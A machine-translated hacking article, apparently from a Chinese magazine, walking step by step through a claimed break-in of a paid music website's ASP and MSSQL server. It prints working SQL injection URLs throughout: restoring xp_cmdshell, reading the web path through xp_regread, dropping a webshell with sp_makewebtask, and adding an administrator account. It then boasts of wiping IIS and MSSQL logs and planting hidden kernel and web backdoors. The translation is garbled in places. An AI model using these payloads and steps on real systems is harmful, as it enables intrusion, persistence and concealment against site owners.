Text / map is smelling
At present, I am very popular on the Internet, that is, the SQL injection vulnerability we usually say, we use this kind of vulnerability to query database information, cross-library, and to upload files through the forum to get the host Webshell (these are some very Usually, the black defense is also described in detail.
Some time ago I conducted a large music toll website for a large music fee. As a result, I used pure script technology to get system administrator privileges. So, today I will introduce all the concrete ideas for all and my specific ideas.
One. Stepping
Stepping on, is the primary work for a server for security testing. Let's take a port scan for the server. I took out a very good scanner written by my friends, the speed is quite fast, you can open 2000 threads at the same time! (WTF: Good!) Half Skills, the port 1-65535 is over.
The open port of the scan is as follows:
21, 80, 1433, 3389
The result of scanning again is the same, almost certainly these. After the impact wave, the server on the network has a lot of security, and the system vulnerability invasion has become difficult. Let me analyze it first: I set the target in 21 and 1433 ports. Now I only look at luck, see if I can sweep out a weak password (WTF: Oh, I want to be very beautiful!) - I am unlucky, I haven't swept it for a long time, I have a moving machine, what is the same today, what Didn't sweep it out. It seems that I only look for an exit from the website script.
two. Full-around exploration of the website
Opened 1433 port, the SQL Server service, the general website is the ASP MSSQL structure to set up, and the injection vulnerability of the ASP script is better than other script vulnerabilities, and the vulnerability has a much more relatively much. Under normal circumstances, I add single quotes after the parameters submitted. If the parameter is not filtered, IE generally returns an error message.
I quickly found a parameter without any filtering.
submit:
http://www.something.com/script.asp?id=2 '
IE returns:
submit:
http://www.something.com/script.asp?id=2 and 1 = 1
IE returns to normal records.
submit:
http://www.something.com/script.asp?id=2 and 1 = 2
IE did not return records.
Ok, this is determined that there is a vulnerability, let's take advantage of this vulnerability to get some information about the server and database. For example, want to see the patches of the server, we submit:
http://www.something.com/script.asp?id=2 and 1 = (SELECT @@ Version)
I have an error, huh, huh, IE returns to us, as shown in Figure 1:
figure 1
It seems that the server hit the SP4 patch, "It is said" After the SP4, there is also an overflow program for 80 and the overflow procedure for MSSQL SP3. However, these are "absolute confidential", it is estimated that there are few people who can get it, and I don't have it anyway, I will take him on that day! Now let's continue!
This server is more secure from the system, so I still have to start from scripting. Let's take a look at the permissions of his database connection account, submit:
http://www.something.com/script.asp?id=2 and 1 = (select is_srvrolemember ('sysadmin')) returns to normal, which proves that the currently connected account is the server role SYSADMIN privilege.
WTF: Is_SrvroleMember ('role' [, 'login'] function is used to determine if the current user login is a member of the specified server role. Among them, Role is the name of the server role being checked. Login is optional, if not specified, then use the current user's login account. If Login is a member of the Role, return 1, not returning 0, if the Role or Login is invalid, then return null.
I almost didn't spray a tea in my mouth on the computer screen. The server role currently connected to the account is actually sysadmin permissions! as shown in picture 2:
figure 2
Haha! It seems that the connection account is connected to the SA account.
submit:
http://www.something.com/script.asp?id=2 and 'sa' = (SELECT System_User)
Used to see if the connection account is connected with SA, IE returns to normal again. This proves that the connection account is really sa, it seems that the permissions are so high.
WTF: When using the application role, execute the Select User will return the name of the currently used application role. If you want to get the identity of the logged in user, use the Transact-SQL statement: SELECT System_User.
Here, many people may think of using the XP_cmdshell extension stored procedure to add system accounts, and then use the terminal to connect the server. This is very good idea! I am also a member of many people! Let's try to see it!
three. Use the MSSQL stored procedure to get WebShell
Below, let's take a look at whether xp_cmdshell is deleted by the administrator! submit:
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
The information returned by IE is as follows:
It seems that XP_cmdshell has been deleted. Oh, let's recover him!
http://www.something.com/script.asp?id=2 ;exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'xplog70.dll'
Try again, is it recovered by XP_CMDSHELL?
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
WTF: Xiaobian in later attempts, found XP_cmdshell recovery? Haha, I don't know which brother left the result?
The same is not returned. This proves that the administrator is renamed this dynamic link library of XPLog70.dll. If you don't delete it, it seems that direct recovery is no way. In this regard, I can only say two words "I forbearance"! Such a lot of vulnerabilities, it is not good to use it, I am not willing to say this, it is powerful. Let's talk about him first, hey, after getting Webshell, I naturally have a way to deal with him, hahaha ... (Stariser smile!).
See how to get WebShell!
Have you seen N.E.v.e.r and CZY articles? Take the Webshell method, both have been introduced in detail. I also write their methods into procedures, convenient for me, but it is difficult to get the web absolute path. Where is the Trojan we generated?
This may be a problem that many cattle have been studying. Fortunately, I still understand MSSQL. I have a way to get his web absolute path, come with me. (WTF: This is definitely a very very big flash point! Everyone will see it!)
Below we have to take advantage of two MSSQL stored procedures. However, it is necessary to introduce you to the XP_REGREAD extension stored procedure and sp_makewebtask web assistant stored procedure: XP_REGREAD is used to read the registry information, and we get this stored procedure to save the web absolute path in the registry.
SP_MAKEWEBTASK is used here to get WebShell, its main function is to export records for the table in the database, and the file name you can specify yourself. Of course, we specify as an ASP script file! Imagine if the script code is saved in the table, the file is the script file. So, the record we add is the script code.
Here I don't have to use n.e.v.e.r. His way is to export library files, exported files are relatively large, and many garbled looks inconvenient, if there is an ASP tag, there is a wrong ASP code, it is not good, open Most Return 500 error The code, so we use CZY methods, which is the web job to get the shell.
1. How can I get the web absolute path?
Ha ha? This problem, I spent a long time to study. Everyone knows that Ms's things are placed in the registry. We can get in the registry, the location is as follows:
HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / W3SVC / Parameters / Virtual Roots
Using the extended stored procedure XP_REGREAD we can get its value.
EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE',
'System / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/'
In this way, I will take it out, but the problem is coming, I take it out, how do we return it in IE? My method is: Create a temporary table, add a field in the table, type: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable. Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. submit:
DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @result output insert into a temporary table (temporary field name) values ( @RESULT);
Then, let's submit: 1 = (Select Count (*) from Temporary Table Where Temporary Field Name> 1)
In this way, IE reports the value of the web path you just plugged in. I also tried to use the variable to report the error, let IE return the value of the variable, the result is failed, so I think the way to build a temporary table add data! Finally, we delete the temporary table of the original built. WebShell gets it, and the work will tell a paragraph.
2. How do you get WebShell?
CZY's article has been written very detailed. So, I just simply mention it! Create a table, build a field, and add the contents of the Trojan to this field. Then, the content is exported to the ASP script in the web absolute path via the XP_MAKEWEBTASK stored procedure. Remove the built-in temporary table again, everything over. Such as:
Execute sp_makewebtask @outputfile = 'web name .asp',
@Query = 'SELECT Your field from your temporary table'
Oh, the result came out. Of course, I have written a procedure, so I don't have to have trouble yourself and a line of add data (WTF: this article has a detailed introduction! Everyone will not be disappointed!). Methods and ideas are written, now let's take action.
Still look at it first, his two extended stored procedures have been deleted. If I was deleted, I don't want to live! Oh, submit:
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where name = 'xp_regread'
Submit again:
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where name = 'sp_makewebtask')
La la la! What day is today, I am happy than the New Year. All returned to normal! The two stored procedures to be used are not deleted.
WTF Note: General administrators will not delete these two, maybe less understanding them, and will not pay attention to them! The crisis is in this!嘿嘿.
Ok, after getting a web absolute path. Continue to build a table:
http://www.something.com/script.asp?id=2;create Table [DBO]. [cyfd] ([GYFD] [char] (255));
In this way, we successfully built a table named CYFD, and added a type of Char and a field name GYFD with a length of 255. Then add data to the table:
http://www.something.com/script.asp?id=2;DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @Result Output Insert INTO CYFD (GYFD) VALUES (@Result); - Read the web absolute path from the registry, and then insert the path into the table just built. Then report the absolute path of WebShell:
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from Cyfd Where GYFD> 1)
After the error, IE returns an error, we get the web absolute path "D: / INETPUB / WWWROOT"! After the effort, it is very sweet! Drink tea! Figure 3
image 3
Then delete the table just built, submit:
http://www.something.com/script.asp?id=2: Drop Table Cyfd;
OK, there is a path under the path. Open the program I write to get the WebShell, enter the vulnerability URL: http://www.yfd.com/yfd.com? ID = 2
Enter the absolute path for saving Trojans: d: / inetpub / wwwroot.
Trojan, I have been configured, the code is streamlined and streamlined, only 30 lines of code, so that the data is submitted to the server. Accelerate speed! The main function of the Trojan is the input content, saving the input content as a file. Oh, through such a Trojan, we can achieve some powerful script Trojans, such as ocean horses.
Not a minute. The programs have been running. Enter the corresponding path, Wahaha (WTF: Brothers who want to eat, I like this "drink"? Haha!), Webshell is coming, the fastest speed generates a marine Trojan, as shown in Figure 4, Figure 5:
Figure 4
Figure 5
I live in happiness! - wtf often says this sentence, I seem to have been infected today! Below we have come!
four. Restore xp_cmdshell, enter system authority!
The following work is very simple, it is very easy. If you don't get 10 minutes, you will give you an administrator account, saying XP_cmdshell has been deleted. And it is impossible to recover, this is the administrator to delete the XPLog70.dll file, or no name. Nothing, let's upload an XPLog70.dll to get everything, through WebShell. I quickly uploaded the XPLog70.dll file to the E: / INETPUB / WWWROOT directory, come, let's recover him, submit:
http://www.something.com/script.asp?id=2 ;exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'e: /inetpub/wwroot/xplog70.dll'
Restore, support the recovery of absolute paths. :) Figure 6
Figure 6
OK. We use IE to see if it has been restored. submit:
http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 嘿嘿. Returns normal. Has been restored, do you still use me? Ha ha! Plus account:
http://www.something.com/script.asp?id=2 ;ec master.dbo.xp_cmdshell 'net user chouyfd chouyfd1314yf / add'
Improve yourself for super administrators
Http://www.something.com/script.asp?id=2 ;ec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd / add'
complete. Open your terminal connection, join! Haha, finally gave me. At this point, I successfully got the system administrator account of this host. Figure 7:
Figure 7
The following work is to clear the log and leave a super back door, flash people!
Fives. Post-post processing
After the terminal is connected, clear the IIS log, and the MSSQL log at the fastest speed.
At the same time, put XP_cmdshell also deleted him, don't let him find it, it will not do it. Move the XPLog70.dll I uploaded to the System32 directory, changed to me, I don't know what the name is called: msxlog32.dll (kill him also can't find it, haha!) Will provide the pigs to the super The kernel back door program is installed, and the script file with a vulnerability is put on the patch. At the same time in his script, I modified the code, submit a specific parameter (POST prompt), showing my web backdoor program! This two back doors are very insurance! What are you afraid of? Just a New Year, I am so happy!
Postscript: There are many places where you may have a lot of places, the space is limited, if necessary, communicate directly with me! :
DY-E@163.net, this time through scripting technology to get the system administrator account. This is also the result I have learned in depth to MSSQL for a long time. This article is mainly because the invasion is displayed, and the intrusion method is a variety of ways. I hope this article is helping everyone. I wish you all a happy year and good luck!
